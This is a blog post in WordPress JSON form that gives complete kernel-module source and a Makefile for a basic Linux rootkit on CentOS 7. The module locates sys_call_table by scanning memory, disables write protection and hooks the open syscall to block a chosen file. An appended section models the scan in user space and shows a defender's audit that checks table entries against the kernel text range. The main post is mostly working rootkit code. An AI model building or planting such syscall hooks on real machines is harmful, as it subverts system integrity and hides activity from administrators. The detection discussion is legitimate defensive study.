{"id":217,"date":"2019-04-14T23:49:28","date_gmt":"2019-04-14T15:49:28","guid":{"rendered":"http:\/\/www.sinkland.cn\/?p=217"},"modified":"2019-08-23T21:37:20","modified_gmt":"2019-08-23T13:37:20","slug":"linux-rootkit%e5%ae%9e%e7%8e%b0%e6%96%87%e4%bb%b6%e4%bf%9d%e6%8a%a4","status":"publish","type":"post","link":"http:\/\/www.sinkland.cn\/?p=217","title":{"rendered":"Linux Rootkit: Implementing File Protection"},"content":{"rendered":"<p>A very basic rootkit: it hooks the <code>open<\/code> system call and refuses to open any path that contains a given file name.<\/p>\n<pre><code class=\"language-bash \">Build system:\nCentOS 7\n\nuname -r\n3.10.0-957.21.3-el7.x86_64\n<\/code><\/pre>\n<pre><code class=\"language-c \">#include &lt;linux\/module.h&gt;\n#include &lt;linux\/kernel.h&gt;\n#include &lt;linux\/syscalls.h&gt;\n#include &lt;linux\/uaccess.h&gt;\n#include &lt;linux\/string.h&gt;\n#include &lt;linux\/errno.h&gt;\n#include &lt;asm\/special_insns.h&gt;\n#include &lt;asm\/processor-flags.h&gt;\n\n\/* Saved original sys_open; on x86 umode_t is an unsigned short *\/\nasmlinkage long (*real_open)(const char __user *filename, int flags, umode_t mode);\n\n\/* sys_call_table is an array of function addresses, so index it as unsigned long *\/\nunsigned long *syscall_table = NULL;\n\n\/*\n * Find sys_call_table without its symbol: sys_close is exported on 3.10, so walk\n * forward from it one pointer at a time until a candidate table has sys_close in\n * its __NR_close slot. loops_per_jiffy is just an exported symbol that lies above\n * the table and bounds the walk.\n *\/\nunsigned long *get_syscall_table(void)\n{\n    unsigned long ptr;\n    unsigned long *p;\n\n    for (ptr = (unsigned long)sys_close;\n         ptr &lt; (unsigned long)&amp;loops_per_jiffy;\n         ptr += sizeof(void *)) {\n        p = (unsigned long *)ptr;\n        if (p[__NR_close] == (unsigned long)sys_close)\n            return p;\n    }\n    return NULL;\n}\n\n\/* Clear CR0.WP so the read-only page holding sys_call_table can be written.\n * Works on 3.10; from 5.3 write_cr0() pins WP and this write faults. *\/\nvoid disable_wp(void)\n{\n    write_cr0(read_cr0() &amp; ~X86_CR0_WP);\n}\n\nvoid enable_wp(void)\n{\n    write_cr0(read_cr0() | X86_CR0_WP);\n}\n\n\/* Replacement for sys_open: refuse any path that contains \"test.txt\" *\/\nasmlinkage long fake_open(const char __user *filename, int flags, umode_t mode)\n{\n    char buf[256];   \/* per-call buffer: a global one races between concurrent opens *\/\n    long len;\n\n    \/* copies at most sizeof(buf) - 1 bytes; returns the length or -EFAULT *\/\n    len = strncpy_from_user(buf, filename, sizeof(buf) - 1);\n    if (len &gt; 0) {\n        buf[len] = '\\0';\n        if (strstr(buf, \"test.txt\") != NULL)\n            return -EPERM;   \/* the original returned -1, which is -EPERM *\/\n    }\n\n    return real_open(filename, flags, mode);\n}\n\nstatic int __init rootkit_init(void)\n{\n    printk(KERN_INFO \"driver start..\\n\");\n\n    syscall_table = get_syscall_table();\n    printk(KERN_INFO \"syscall_table: %p\\n\", syscall_table);\n    if (syscall_table == NULL)\n        return -ENOENT;   \/* fail the load instead of staying resident with no hook *\/\n\n    disable_wp();\n    real_open = (void *)syscall_table[__NR_open];\n    syscall_table[__NR_open] = (unsigned long)fake_open;\n    enable_wp();\n\n    return 0;\n}\n\nstatic void __exit rootkit_exit(void)\n{\n    printk(KERN_INFO \"driver exit..\\n\");\n    if (syscall_table == NULL)\n        return;\n\n    disable_wp();\n    syscall_table[__NR_open] = (unsigned long)real_open;\n    enable_wp();\n}\n\nmodule_init(rootkit_init);\nmodule_exit(rootkit_exit);\n\nMODULE_LICENSE(\"GPL\");\n<\/code><\/pre>\n<p>Makefile:<\/p>\n<pre><code class=\"language-makefile \">obj-m = rootkit.o\n\nK_DIR = $(shell uname -r)\nPWD = $(shell pwd)\n\nall:\n\tmake -C \/lib\/modules\/$(K_DIR)\/build M=$(PWD) modules\nclean:\n\tmake -C \/lib\/modules\/$(K_DIR)\/build M=$(PWD) clean\n<\/code><\/pre>\n<p>Caveats: only <code>__NR_open<\/code> is hooked, so <code>openat(2)<\/code> (which newer glibc versions use to implement <code>open()<\/code>), <code>stat<\/code>, <code>execve<\/code> and every other path-resolving call still reach the file; the check is a substring match on the raw user path, so a hard link or symlink under another name bypasses it; and because the hooked slot now points into module memory instead of core kernel text, walking <code>sys_call_table<\/code> and checking each entry against <code>_stext<\/code>\/<code>_etext<\/code> exposes the hook at once.<\/p>\n<p>Result:<br \/>\n<img decoding=\"async\" src=\"http:\/\/pic.sinkland.cn\/rootkit.png\" alt=\"image\" \/><\/p>\n","protected":false},"excerpt":{"rendered":"<p>A very basic rootkit: it hooks the open system call and refuses to open any path that contains a given file name. Build system: CentOS 7 uname -r 3.10.0- [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"_links":{"self":[{"href":"http:\/\/www.sinkland.cn\/index.php?rest_route=\/wp\/v2\/posts\/217"}],"collection":[{"href":"http:\/\/www.sinkland.cn\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.sinkland.cn\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.sinkland.cn\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.sinkland.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=217"}],"version-history":[{"count":1,"href":"http:\/\/www.sinkland.cn\/index.php?rest_route=\/wp\/v2\/posts\/217\/revisions"}],"predecessor-version":[{"id":218,"href":"http:\/\/www.sinkland.cn\/index.php?rest_route=\/wp\/v2\/posts\/217\/revisions\/218"}],"wp:attachment":[{"href":"http:\/\/www.sinkland.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=217"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.sinkland.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=217"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.sinkland.cn\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=217"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
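The table scan the module relies on, the slot overwrite it performs, and the check a defender runs against that overwrite, as an added user-space model (example code written for this page, not from the original post or the module above). Everything in it is constructed: the "kernel image" is a flat array, the symbol addresses (`K_STEXT`, `K_ETEXT`, `SYS_ENTRY`, `HOOK_ADDR`) are hypothetical rather than real CentOS 7 values, and the table is shortened to eight slots. `find_syscall_table()` mirrors the module's `get_syscall_table()` heuristic, `audit_table()` is the `_stext`/`_etext` range check, and `demo_scan_false_positive()` shows the heuristic's weak spot: it trusts the first word that matches `sys_close`.

```c
/*
 * Added example (not from the original post): a user-space model of the
 * module's sys_call_table scan and of the audit a defender runs against
 * the hook it installs. The "kernel image", symbol addresses and 8-slot
 * table below are constructed for the demo; nothing touches a real kernel.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define NR_OPEN      2      /* __NR_open  on x86_64 */
#define NR_CLOSE     3      /* __NR_close on x86_64 */
#define NR_SYSCALLS  8      /* demo table shortened to 8 slots */
#define IMG_WORDS    64     /* constructed image size, in pointers */
#define TABLE_OFF    40     /* word index where the demo places sys_call_table */

/* Constructed symbol addresses (hypothetical, not real CentOS 7 values). */
#define K_STEXT       0xffffffff81000000ULL   /* core kernel text start */
#define K_ETEXT       0xffffffff81a00000ULL   /* core kernel text end   */
#define SYS_ENTRY(nr) (K_STEXT + 0x200000ULL + (uint64_t)(nr) * 0x100ULL)
#define SYS_CLOSE     SYS_ENTRY(NR_CLOSE)
#define HOOK_ADDR     0xffffffffa0001000ULL   /* module mapping area */

static uint64_t img[IMG_WORDS];

/* Fill the image with non-pointer noise, then place a clean table at TABLE_OFF. */
static void build_image(void)
{
    size_t i;
    for (i = 0; i < IMG_WORDS; i++)
        img[i] = 0xdead0000ULL + i;
    for (i = 0; i < NR_SYSCALLS; i++)
        img[TABLE_OFF + i] = SYS_ENTRY(i);
}

/*
 * Same heuristic as the module's get_syscall_table(): walk the image one
 * pointer at a time and return the first index p such that mem[p + __NR_close]
 * holds sys_close's address; -1 if nothing matches.
 */
static long find_syscall_table(const uint64_t *mem, size_t nwords, uint64_t sys_close)
{
    size_t p;
    for (p = 0; p + NR_CLOSE < nwords; p++)
        if (mem[p + NR_CLOSE] == sys_close)
            return (long)p;
    return -1;
}

/*
 * Defender-side audit: every slot of a clean sys_call_table points into core
 * kernel text [stext, etext). A slot pointing anywhere else (a loaded module,
 * the heap) is a hook. Returns how many slots fail and stores their syscall
 * numbers in bad[] (at most max_bad of them).
 */
static int audit_table(const uint64_t *table, size_t n, uint64_t stext,
                       uint64_t etext, int *bad, size_t max_bad)
{
    int nbad = 0;
    size_t i;
    for (i = 0; i < n; i++) {
        if (table[i] < stext || table[i] >= etext) {
            if ((size_t)nbad < max_bad)
                bad[nbad] = (int)i;
            nbad++;
        }
    }
    return nbad;
}

/*
 * Scenario 1: locate the table, overwrite the open slot with a module address
 * exactly as rootkit_init() does, and audit. Returns the syscall number the
 * audit flags (NR_OPEN), or a negative code if a step behaves unexpectedly.
 */
static int demo_hook_is_visible(void)
{
    int bad[NR_SYSCALLS];
    long off;
    uint64_t *table;

    build_image();
    off = find_syscall_table(img, IMG_WORDS, SYS_CLOSE);
    if (off != TABLE_OFF)
        return -1;
    table = &img[off];
    if (audit_table(table, NR_SYSCALLS, K_STEXT, K_ETEXT, bad, NR_SYSCALLS) != 0)
        return -2;                   /* a clean table must audit clean */

    table[NR_OPEN] = HOOK_ADDR;      /* the rootkit's write into the WP-cleared page */

    if (audit_table(table, NR_SYSCALLS, K_STEXT, K_ETEXT, bad, NR_SYSCALLS) != 1)
        return -3;
    return bad[0];
}

/*
 * Scenario 2: the scan trusts the first match. If sys_close's address also
 * appears as plain data below the real table (another function table, a
 * relocation), the scan returns that spot. Returns the offset it picks.
 */
static long demo_scan_false_positive(void)
{
    build_image();
    img[13] = SYS_CLOSE;             /* stray copy at word 13, below TABLE_OFF */
    return find_syscall_table(img, IMG_WORDS, SYS_CLOSE);
}

int main(void)
{
    printf("audit flags syscall %d after hooking\n", demo_hook_is_visible());
    printf("scan with a stray sys_close pointer returns offset %ld (real table at %d)\n",
           demo_scan_false_positive(), TABLE_OFF);
    return 0;
}
```

Build with `cc -Wall demo.c` and run it: the audit reports syscall 2 (`__NR_open`) as soon as the slot is overwritten, and with a stray copy of `sys_close`'s address at word 13 the scan returns offset 10 instead of the real table at 40, which on a live kernel would mean writing the hook into whatever happens to sit there. On the 3.10 kernel the same audit is done by reading `sys_call_table`, `_stext` and `_etext` from `/proc/kallsyms` inside a checking module, or against a memory image with a forensics tool (Volatility's `linux_check_syscall` performs this comparison).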